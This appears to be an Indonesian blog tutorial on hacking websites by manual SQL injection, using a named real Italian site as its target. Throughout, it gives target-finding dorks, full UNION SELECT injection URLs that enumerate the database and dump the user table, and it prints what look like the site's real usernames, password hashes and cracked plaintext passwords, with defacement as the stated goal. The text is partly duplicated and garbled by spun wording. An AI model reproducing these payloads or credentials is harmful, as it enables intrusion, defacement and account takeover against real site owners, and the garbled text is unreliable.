Update, Cara Hack Website Dengan Sql Injeksi
Hallo kawan bagaimana kabarnya?
oke kali ini saya membuat tutorial bagaimana cara hack website dengan sql injeksi manual:v
kok caranya manual sih:v
kenapa tidak pakai aplikasi saja:v
sebenernya banyak aplikasi untuk hack website dengan metode sql injeksi
seperti programme havij,sqlmap kalau di hp bisa pakai DroidSqli.
tp saya lebih suka sql injeksi manual karena kelebihanya kita bisa menginjeksi di halaman user/member yang akan kita gunakan mencari põrnikas agar kita bia menginjeksi database dan mencari username dan password admin, Coba kalian fikirkan apakah aplikasi bisa menginjeksi põrnikas di halaman admin? tidak mungkin bisa bro karena akan di redirect ke halaman login
Oke langsung saja simafk tutorialnya.
contoh: target.com/index.php?id=sql'
target.com/index.php?id=1'
Pertama-tama kita cari target dengan dork, anggap saja kalian udah pada mengerti, ini saya kasih contoh dork, kalian kembangin lagi sendiri.
Dan saya sudah punya target www.mywaymedia.it/readMore.php?id=15
Selanjutnya kita coba examination spider web tersebut vuln atau tidak dengan menambahkan karakter (') , maka jadinya seperti ini
Dan ternyata fault
Nah kita tau version database tersebut 5.1.73 berati bisa kita lanjut, karena version iv agak rumit, tapi rata-rata version five keatas,
Selanjutnya
Maka perintahnya seperti berikut.
Maka nanti kita akan mendapatkan nama-nama tabular array di database tersebut
Disini saya mendapatkan nama-nama tabular array news,news_utf,tbl_users
Karena kita disini tujuanya deface berati kita mencari user dan password admin, berati kita cari tabular array yang kemungkinan itu tabular array admin, seperti admin dll,
disini saya mendapatkan tabular array tbl_users
Selanjutnya kita ganti
kalau saya disini langsung menggunakan hakbar, caranya dengan cara klik SQL > MySQL > MySQL CHAR(), selanjutnya masukan nama table, maka akan jadi seperti berikut CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)
Maka perintahnya seperti berikut
Maka nanti kita akan mendapatkan nama-nama isi di tabular array tbl_users,
Disini saya mendapatkan nama-nama tabular array user_id,user_name,user_pass,user_lastaccess
Disini sudah terlihat nama tabular array user_name dan user_pass berati langkah selajutnya melihat datanya
Ganti
Dan ganti
Maka perintahnya seperti berikut
Dan kita sudah mendapatkan username dan password site tersebut
publishing@vivacom.com:67e84f9ebb0d4a3f782d61edc9a91528
myway:a17e60c21d70e8d576e4d1dfce3ba1f8
User: publishing@vivacom.com
Password: 67e84f9ebb0d4a3f782d61edc9a91528
dan
User: myway
Password: a17e60c21d70e8d576e4d1dfce3ba1f8
Untuk password masih berbentuk hash MD5, bisa kalian crack disini,
Maka akan muncul password aslinya
67e84f9ebb0d4a3f782d61edc9a91528 MD5 : 190773_v
a17e60c21d70e8d576e4d1dfce3ba1f8 MD5 : 12MMant
Password: 190773_v
dan
User: myway
Password: 12MMant
Selesai.
oke kali ini saya membuat tutorial bagaimana cara hack website dengan sql injeksi manual:v
kok caranya manual sih:v
kenapa tidak pakai aplikasi saja:v
sebenernya banyak aplikasi untuk hack website dengan metode sql injeksi
seperti programme havij,sqlmap kalau di hp bisa pakai DroidSqli.
tp saya lebih suka sql injeksi manual karena kelebihanya kita bisa menginjeksi di halaman user/member yang akan kita gunakan mencari põrnikas agar kita bia menginjeksi database dan mencari username dan password admin, Coba kalian fikirkan apakah aplikasi bisa menginjeksi põrnikas di halaman admin? tidak mungkin bisa bro karena akan di redirect ke halaman login
Oke langsung saja simafk tutorialnya.
Bagaimana cara mengetahui spider web tersebut vuln sqli?
Untuk mengetahui spider web tersebut vuln sqli atau terkena celah sqli adalah dengan cara membuat fault url tersebut, dengan menambahkan karakter (') pada id di akhir url,contoh: target.com/index.php?id=sql'
target.com/index.php?id=1'
Pertama-tama kita cari target dengan dork, anggap saja kalian udah pada mengerti, ini saya kasih contoh dork, kalian kembangin lagi sendiri.
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
Dan saya sudah punya target www.mywaymedia.it/readMore.php?id=15
Selanjutnya kita coba examination spider web tersebut vuln atau tidak dengan menambahkan karakter (') , maka jadinya seperti ini
www.mywaymedia.it/readMore.php?id=15'
Notice: Use of undefined constant Errore - assumed 'Errore' inward /var/www/www.mywaymedia.it/readMore.php on trouble 15ErroreYou convey an fault inward your SQL syntax; cheque the manual that corresponds to your MySQL server version for the correct syntax to purpose close ''' at trouble 1Untuk fault website berbeda-beda
Berikut contoh-contoh fault pada spider web yang terkena celah SQL Injection
- You convey an fault inward your SQL syntax;
- Warning: mysql_fetch_array()
- Warning: mysql_num_rows()
Dan masih banyak lagi, bukan hanya fault aja, spider web blank atau ada information yg hilang itu juga tanda vuln,
Disini saya akan menggunakan add together ons hakbar untuk mempermudah menginjeksinya, yang belum punya bisa pasang disini,
Kalau sudah untuk menampilkan hakbar tekan F9,
Lanjut menginjeksi
Sekarang kita akan mencari berapa jumlah column database site itu dengan menambahkan perintah gild by, tambahkan + untuk spasi, jadi perintahnya seperti ini
www.mywaymedia.it/readMore.php?id=15+order+by+1--
Lalu klik Execute Nanti spider web akan kembali normal,
lalu ganti angka 1 ke angka two dan seterusnya sampai ketemu fault lagi agar lebih jelas lihat gambar dibawah
Disini saya menemukan errornya di order+by +5--
Berati kita sudah menemukan jumlah column database 4, loh kok 4? sedangkan disitu errornya di 5,
Begini saya jelaskan, setelah kita memasukan perintah gild past times 1 sampe iv tidak ada fault dan errornya di angka five secara logika berati di column five tidak ada di database site tersebut, jadi column database cuma sampe iv aja, kurang lebih begitu.
Lanjut.
Selanjutnya kita masukan perintah wedlock select, ganti gild past times dengan
+union+select+1,2,3,4--
dan sebelum angka di belakang url tersebut tambahkan tanda (-), maksud 1,2,3,4 itu adalah angka column tadi, Maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,3,4--
maka nanti kita akan mendapatkan sebuah angka, disini saya mendaptkan angka iii dan 4,
Kedua angka itu sebenarnya sama, kita pilih salah 1, saya memilih angka iii untuk tahap selajutnya,
Sekarang kita lihat berapa version database site tersebut, ganti angka iii di wedlock direct tadi dengan perintah
@@version
, maka perintahnya seperti berikut,www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,@@version,4--
Nah kita tau version database tersebut 5.1.73 berati bisa kita lanjut, karena version iv agak rumit, tapi rata-rata version five keatas,
Selanjutnya
@@version
kita ganti dengan perintah group_concat(table_name)
dan di akhir angka sebelum tanda --
tadi masukan perintah from+information_schema.tables+where+table_schema=database()
Maka perintahnya seperti berikut.
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
Maka nanti kita akan mendapatkan nama-nama tabular array di database tersebut
Karena kita disini tujuanya deface berati kita mencari user dan password admin, berati kita cari tabular array yang kemungkinan itu tabular array admin, seperti admin dll,
disini saya mendapatkan tabular array tbl_users
Selanjutnya kita ganti
group_concat(table_name)
menjadi group_concat(column_name)
dan from+information_schema.tables+where+table_schema=
menjadi from+information_schema.columns+where+table_name=
kemudian database()
kita ganti dengan tabular array tbl_users yang sudah kita rubah dengan decimal, mengubah decimal bisa mengunakan tools disini atau bisa langsung menggunakan hakbar.kalau saya disini langsung menggunakan hakbar, caranya dengan cara klik SQL > MySQL > MySQL CHAR(), selanjutnya masukan nama table, maka akan jadi seperti berikut CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)--
Maka nanti kita akan mendapatkan nama-nama isi di tabular array tbl_users,
Disini saya mendapatkan nama-nama tabular array user_id,user_name,user_pass,user_lastaccess
Disini sudah terlihat nama tabular array user_name dan user_pass berati langkah selajutnya melihat datanya
Ganti
group_concat(column_name)
menjadi group_concat(user_name,0x3a,user_pass)
untuk 0x3a
itu decimal dari tanda (:)Dan ganti
from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)
menjadi from+tbl_users
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php ?id=-15+union+select+1,2,group_concat(user_name,0x3a,user_pass),4+from+tbl_users--
Dan kita sudah mendapatkan username dan password site tersebut
publishing@vivacom.com:67e84f9ebb0d4a3f782d61edc9a91528
myway:a17e60c21d70e8d576e4d1dfce3ba1f8
User: publishing@vivacom.com
Password: 67e84f9ebb0d4a3f782d61edc9a91528
dan
User: myway
Password: a17e60c21d70e8d576e4d1dfce3ba1f8
Untuk password masih berbentuk hash MD5, bisa kalian crack disini,
Maka akan muncul password aslinya
67e84f9ebb0d4a3f782d61edc9a91528 MD5 : 190773_v
a17e60c21d70e8d576e4d1dfce3ba1f8 MD5 : 12MMant
Maka hasilnya seperti berikut
User: publishing@vivacom.comPassword: 190773_v
dan
User: myway
Password: 12MMant
Selesai.
Comments
Post a Comment